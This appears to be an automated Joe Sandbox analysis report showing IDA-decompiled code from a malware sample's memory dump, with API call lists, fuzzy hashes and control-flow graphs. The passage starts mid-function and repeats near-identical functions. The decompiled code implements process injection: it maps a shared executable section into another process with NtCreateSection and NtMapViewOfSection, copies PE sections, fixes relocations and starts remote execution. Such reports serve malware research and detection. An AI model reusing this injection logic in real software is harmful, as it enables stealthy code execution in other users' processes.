                                                											__eflags =  *_t197;
                                                											if( *_t197 == 0) {
                                                												break;
                                                											}
                                                											_t179 =  *_t197;
                                                											_t197 = _t197 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t169;
                                                												__eflags =  *((intOrPtr*)( *(_t201 - 0x48) + 0 + _t179));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t187);
                                                										__eflags = 0;
                                                										_t109 = _t201 - 4;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0, _t187[0xa] +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t109, 0);
                                                									} else {
                                                										L52();
                                                										_pop(_t180);
                                                										_t181 = _t180 - 0x1892;
                                                										 *((intOrPtr*)(_t181 + 0x18c6)) = _t181 + 0x304c;
                                                										L004012E3(_t128, _t226);
                                                										0x33(_t181 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t181 + 0x18eb)) = _t181 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t203;
                                                				_push(0x392);
                                                				_t156 = 0xf1;
                                                				return L00401274(_t92, _t156, _t187, _t226);
                                                			}







































                                                0x00401605
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.447095995.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_thgcici.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 415a5842a2c5ec0b738834669aaf024952b371ede68f2027b92f6496f3657053
                                                • Instruction ID: 1fcee3e81df0436361f0f1364465162f3818ae34080ff9e07162e38916551545
                                                • Opcode Fuzzy Hash: 415a5842a2c5ec0b738834669aaf024952b371ede68f2027b92f6496f3657053
                                                • Instruction Fuzzy Hash: 8451F8B5900249BBEF209F91CC48FEFBFB8EF85B10F140159FA11BA2A5D6749945CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 317 401613-40162b call 401274 323 401630-401635 317->323 324 40162d 317->324 326 401956-40195e 323->326 327 40163b-40164c 323->327 324->323 326->323 332 401963-4019b3 call 401274 326->332 330 401652-40167b 327->330 331 401954 327->331 330->331 340 401681-401698 NtDuplicateObject 330->340 331->332 340->331 342 40169e-4016c2 NtCreateSection 340->342 343 4016c4-4016e5 NtMapViewOfSection 342->343 344 40171e-401744 NtCreateSection 342->344 343->344 346 4016e7-401703 NtMapViewOfSection 343->346 344->331 347 40174a-40174e 344->347 346->344 349 401705-40171b 346->349 347->331 350 401754-401775 NtMapViewOfSection 347->350 349->344 350->331 352 40177b-401797 NtMapViewOfSection 350->352 352->331 355 40179d call 4017a2 352->355
                                                C-Code - Quality: 59%
                                                			E00401613(void* __ebx, void* __esi, void* __eflags) {
                                                				void* _t85;
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t129;
                                                				void** _t132;
                                                				signed int _t139;
                                                				int _t140;
                                                				void* _t158;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				signed int _t165;
                                                				signed int _t166;
                                                				void* _t167;
                                                				intOrPtr* _t168;
                                                				void* _t171;
                                                				intOrPtr _t181;
                                                				void* _t182;
                                                				void* _t183;
                                                				HANDLE* _t189;
                                                				HANDLE* _t191;
                                                				void* _t196;
                                                				intOrPtr* _t199;
                                                				void* _t202;
                                                				void* _t203;
                                                				intOrPtr* _t205;
                                                				void* _t209;
                                                				long _t224;
                                                
                                                				L00401274(_t85, 0xf1, __esi, __eflags);
                                                				_t129 =  *((intOrPtr*)(_t203 + 8));
                                                				 *((intOrPtr*)(_t203 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t129 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t203 - 0x5c)) = _t88;
                                                				_t189 = _t203 - 0x60;
                                                				 *_t189 = 0;
                                                				 *((intOrPtr*)(_t129 + 0x4c))(_t88, _t189);
                                                				_t91 =  *_t189;
                                                				if(_t91 != 0) {
                                                					_t132 = _t203 - 0x30;
                                                					 *_t132 = _t91;
                                                					_t132[1] = 0;
                                                					_t189 = _t203 - 0x28;
                                                					 *((intOrPtr*)(_t129 + 0x10))(_t189, 0x18);
                                                					 *_t189 = 0x18;
                                                					_push(_t203 - 0x30);
                                                					_push(_t189);
                                                					_push(0x40);
                                                					_push(_t203 - 0x10);
                                                					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t203 - 8)) = 0;
                                                						_t99 = _t203 - 0x50;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t191 = _t203 - 0x54;
                                                						if(NtCreateSection(_t191, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							 *_t25 =  *(_t203 - 0x50);
                                                							_t122 = _t203 - 0x44;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t191, 0xffffffff, _t122, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                                                								_t124 = _t203 - 0x3c;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t191,  *(_t203 - 0xc), _t124, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                                                									_t202 =  *(_t203 - 0x44);
                                                									 *((intOrPtr*)(_t129 + 0x20))(0, _t202, 0x104);
                                                									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
                                                									 *((intOrPtr*)(_t203 - 8)) =  *((intOrPtr*)(_t203 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 = _t203 - 0x50;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
                                                						_t189 = _t203 - 0x58;
                                                						if(NtCreateSection(_t189, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t203 - 8)) != 0) {
                                                							 *_t46 =  *(_t203 - 0x50);
                                                							_t103 = _t203 - 0x48;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t189, 0xffffffff, _t103, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                                                								_t105 = _t203 - 0x40;
                                                								 *_t105 = 0;
                                                								_t224 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t105, 0, 0, 0, _t203 - 0x38, 1, 0, 0x20);
                                                								if(_t224 == 0) {
                                                									L18();
                                                									if(_t224 == 0 && _t224 != 0) {
                                                										asm("hlt");
                                                										_push(_t205);
                                                									}
                                                									_push(0x2ea6);
                                                									_t209 = _t205 + 4;
                                                									_t162 = 0x2260;
                                                									_t163 = _t162 << 5;
                                                									_t164 = _t163 + 0x2260;
                                                									asm("lodsb");
                                                									_t165 = _t164;
                                                									asm("loop 0xffffffc4");
                                                									_t166 = _t165 ^ 0xad610a21;
                                                									_t205 = _t209 - _t166;
                                                									_t196 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
                                                									_t139 =  *(_t196 + 6) & 0x0000ffff;
                                                									_push(_t196);
                                                									_t167 = _t196;
                                                									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                                                										_t168 = _t167 + 0xf8;
                                                										__eflags = _t168;
                                                									} else {
                                                										_t168 = _t167 + 0x108;
                                                									}
                                                									_push(_t139);
                                                									_t140 =  *(_t168 + 0x10);
                                                									if(_t140 != 0) {
                                                										memcpy( *((intOrPtr*)(_t168 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t168 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t140);
                                                										_t205 = _t205 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t189);
                                                									_t228 =  *((intOrPtr*)(_t203 - 0x34));
                                                									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                                                										_push(_t189);
                                                										_t171 = _t189[0xd] -  *(_t203 - 0x40);
                                                										_t199 = _t189[0x28] +  *(_t203 - 0x48);
                                                										__eflags = _t199;
                                                										while(1) {
                                                											__eflags =  *_t199;
                                                											if( *_t199 == 0) {
                                                												break;
                                                											}
                                                											_t181 =  *_t199;
                                                											_t199 = _t199 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t171;
                                                												__eflags =  *((intOrPtr*)( *(_t203 - 0x48) + 0 + _t181));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t189);
                                                										__eflags = 0;
                                                										_t109 = _t203 - 4;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t129 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0, _t189[0xa] +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t109, 0);
                                                									} else {
                                                										L51();
                                                										_pop(_t182);
                                                										_t183 = _t182 - 0x1892;
                                                										 *((intOrPtr*)(_t183 + 0x18c6)) = _t183 + 0x304c;
                                                										L004012E3(_t129, _t228);
                                                										0x33(_t183 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t183 + 0x18eb)) = _t183 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t205;
                                                				_push(0x392);
                                                				_t158 = 0xf1;
                                                				return L00401274(_t92, _t158, _t189, _t228);
                                                			}







































                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.447095995.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_thgcici.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 22a0d11da6358484d5fb3989fe7d62fe56c3f1842a9ccbaabd161204e5d78bb4
                                                • Instruction ID: d304ef28c580210a7a0f2ed53d1cda2a55b28a26347542abe822579cf832a140
                                                • Opcode Fuzzy Hash: 22a0d11da6358484d5fb3989fe7d62fe56c3f1842a9ccbaabd161204e5d78bb4
                                                • Instruction Fuzzy Hash: 5E51F6B5900249BBEF209F91CC48FEBBBB8EF85B10F100159FA11BA2A5D6749945CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 358 401609-40162b call 401274 362 401630-401635 358->362 363 40162d 358->363 365 401956-40195e 362->365 366 40163b-40164c 362->366 363->362 365->362 371 401963-4019b3 call 401274 365->371 369 401652-40167b 366->369 370 401954 366->370 369->370 379 401681-401698 NtDuplicateObject 369->379 370->371 379->370 381 40169e-4016c2 NtCreateSection 379->381 382 4016c4-4016e5 NtMapViewOfSection 381->382 383 40171e-401744 NtCreateSection 381->383 382->383 385 4016e7-401703 NtMapViewOfSection 382->385 383->370 386 40174a-40174e 383->386 385->383 388 401705-40171b 385->388 386->370 389 401754-401775 NtMapViewOfSection 386->389 388->383 389->370 391 40177b-401797 NtMapViewOfSection 389->391 391->370 394 40179d call 4017a2 391->394
                                                C-Code - Quality: 59%
                                                			E00401609(void* __esi) {
                                                				void* _t86;
                                                				intOrPtr _t89;
                                                				void* _t92;
                                                				void* _t93;
                                                				struct _GUID _t100;
                                                				struct _GUID _t102;
                                                				PVOID* _t104;
                                                				PVOID* _t106;
                                                				intOrPtr* _t110;
                                                				PVOID* _t123;
                                                				PVOID* _t125;
                                                				intOrPtr _t129;
                                                				void** _t132;
                                                				signed int _t139;
                                                				int _t140;
                                                				void* _t157;
                                                				signed int _t161;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				signed int _t165;
                                                				void* _t166;
                                                				intOrPtr* _t167;
                                                				void* _t170;
                                                				intOrPtr _t180;
                                                				void* _t181;
                                                				void* _t182;
                                                				HANDLE* _t188;
                                                				HANDLE* _t190;
                                                				void* _t195;
                                                				intOrPtr* _t198;
                                                				void* _t201;
                                                				void* _t202;
                                                				signed int _t204;
                                                				signed int _t205;
                                                				void* _t209;
                                                				signed int _t210;
                                                				long _t224;
                                                
                                                				_t205 = _t204 |  *(_t202 + 0xf1baef);
                                                				_t210 = _t205;
                                                				L00401274(_t86, 0xf1, __esi, _t210);
                                                				_t129 =  *((intOrPtr*)(_t202 + 8));
                                                				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t89 =  *((intOrPtr*)(_t129 + 0x48))();
                                                					if(_t89 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t202 - 0x5c)) = _t89;
                                                				_t188 = _t202 - 0x60;
                                                				 *_t188 = 0;
                                                				 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t188);
                                                				_t92 =  *_t188;
                                                				if(_t92 != 0) {
                                                					_t132 = _t202 - 0x30;
                                                					 *_t132 = _t92;
                                                					_t132[1] = 0;
                                                					_t188 = _t202 - 0x28;
                                                					 *((intOrPtr*)(_t129 + 0x10))(_t188, 0x18);
                                                					 *_t188 = 0x18;
                                                					_push(_t202 - 0x30);
                                                					_push(_t188);
                                                					_push(0x40);
                                                					_push(_t202 - 0x10);
                                                					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t202 - 8)) = 0;
                                                						_t100 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t100 + 4)) = 0;
                                                						 *_t100 = 0x5000;
                                                						_t190 = _t202 - 0x54;
                                                						if(NtCreateSection(_t190, 6, 0, _t100, 4, 0x8000000, 0) == 0) {
                                                							 *_t26 =  *(_t202 - 0x50);
                                                							_t123 = _t202 - 0x44;
                                                							 *_t123 = 0;
                                                							if(NtMapViewOfSection( *_t190, 0xffffffff, _t123, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t125 = _t202 - 0x3c;
                                                								 *_t125 = 0;
                                                								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t125, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                									_t201 =  *(_t202 - 0x44);
                                                									 *((intOrPtr*)(_t129 + 0x20))(0, _t201, 0x104);
                                                									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t102 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t102 + 4)) = 0;
                                                						 *_t102 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                						_t188 = _t202 - 0x58;
                                                						if(NtCreateSection(_t188, 0xe, 0, _t102, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
                                                							 *_t47 =  *(_t202 - 0x50);
                                                							_t104 = _t202 - 0x48;
                                                							 *_t104 = 0;
                                                							if(NtMapViewOfSection( *_t188, 0xffffffff, _t104, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t106 = _t202 - 0x40;
                                                								 *_t106 = 0;
                                                								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t106, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
                                                								if(_t224 == 0) {
                                                									L17();
                                                									if(_t224 == 0 && _t224 != 0) {
                                                										asm("hlt");
                                                										_push(_t205);
                                                									}
                                                									_push(0x2ea6);
                                                									_t209 = _t205 + 4;
                                                									_t161 = 0x2260;
                                                									_t162 = _t161 << 5;
                                                									_t163 = _t162 + 0x2260;
                                                									asm("lodsb");
                                                									_t164 = _t163;
                                                									asm("loop 0xffffffc4");
                                                									_t165 = _t164 ^ 0xad610a21;
                                                									_t205 = _t209 - _t165;
                                                									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                                                									_t139 =  *(_t195 + 6) & 0x0000ffff;
                                                									_push(_t195);
                                                									_t166 = _t195;
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_t167 = _t166 + 0xf8;
                                                										__eflags = _t167;
                                                									} else {
                                                										_t167 = _t166 + 0x108;
                                                									}
                                                									_push(_t139);
                                                									_t140 =  *(_t167 + 0x10);
                                                									if(_t140 != 0) {
                                                										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                                                										_t205 = _t205 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t188);
                                                									_t228 =  *((intOrPtr*)(_t202 - 0x34));
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_push(_t188);
                                                										_t170 = _t188[0xd] -  *(_t202 - 0x40);
                                                										_t198 = _t188[0x28] +  *(_t202 - 0x48);
                                                										__eflags = _t198;
                                                										while(1) {
                                                											__eflags =  *_t198;
                                                											if( *_t198 == 0) {
                                                												break;
                                                											}
                                                											_t180 =  *_t198;
                                                											_t198 = _t198 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t170;
                                                												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t188);
                                                										__eflags = 0;
                                                										_t110 = _t202 - 4;
                                                										 *_t110 = 0;
                                                										 *((intOrPtr*)(_t129 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t110, 0);
                                                									} else {
                                                										L50();
                                                										_pop(_t181);
                                                										_t182 = _t181 - 0x1892;
                                                										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
                                                										L004012E3(_t129, _t228);
                                                										0x33(_t182 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t93 =  *_t205;
                                                				_push(0x392);
                                                				_t157 = 0xf1;
                                                				return L00401274(_t93, _t157, _t188, _t228);
                                                			}









































                                                0x00401609
                                                0x00401609
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
